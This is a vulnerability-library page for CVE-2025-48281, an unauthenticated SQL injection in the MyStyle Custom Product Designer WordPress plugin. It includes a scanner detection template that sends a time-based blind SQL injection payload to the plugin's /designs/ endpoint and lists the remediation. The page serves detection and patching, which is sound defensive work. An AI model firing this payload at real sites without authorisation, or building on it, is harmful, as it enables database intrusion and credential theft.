/Vulnerability Library

MyStyle Custom Product Designer <= 3.21.1 - SQL Injection

CVE-2025-48281
Verified

Description

The MyStyle Custom Product Designer plugin for WordPress is vulnerable to SQL Injection in versions up to, and including, 3.21.1 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.

Severity

Critical

CVSS Score

9.3

Exploit Probability

5%

Published Date

February 28, 2026

Template Author

shivam kamboj

CVE-2025-48281.yaml
id: CVE-2025-48281

info:
  name: MyStyle Custom Product Designer <= 3.21.1 - SQL Injection
  author: Shivam Kamboj
  severity: critical
  description: |
    The MyStyle Custom Product Designer plugin for WordPress is vulnerable to SQL Injection in versions up to, and including, 3.21.1 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
  impact: |
    An unauthenticated attacker can extract sensitive information from the database including user credentials, password hashes, and other confidential data via time-based blind SQL injection.
  remediation: Update to version 3.21.2 or later.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2025-48281
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.3
    cve-id: CVE-2025-48281
    epss-score: 0.05014
    epss-percentile: 0.89834
    cwe-id: CWE-89
  metadata:
    verified: true
    max-request: 1
  tags: cve,cve2025,wordpress,wp,wp-plugin,sqli,mystyle-custom-product-designer,vkev

http:
  - raw:
      - |
        @timeout: 20s
        GET /designs/?orderby=(SELECT+42+FROM+(SELECT(SLEEP(7)))test) HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'duration>=7'
          - 'status_code == 200'
          - contains(body, 'mystyle-custom-product-designer') || contains(body, 'mystyle-design-profile')
        condition: and
# digest: 490a0046304402203f6484224c6678f28dfc55d225dc047aa59dfdfd04c2711fba85dadbc804310702207664b5c9dc98e47caa850a05af8fb7e40f6c5eee3096e5fe22e7fad7f3ce7b1d:922c64590222798bb761d5b6d8e72950
9.3Score

CVSS Metrics

CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVE ID:
cve-2025-48281
CWE ID:
cwe-89

References

https://nvd.nist.gov/vuln/detail/CVE-2025-48281

Remediation Steps

Update to version 3.21.2 or later.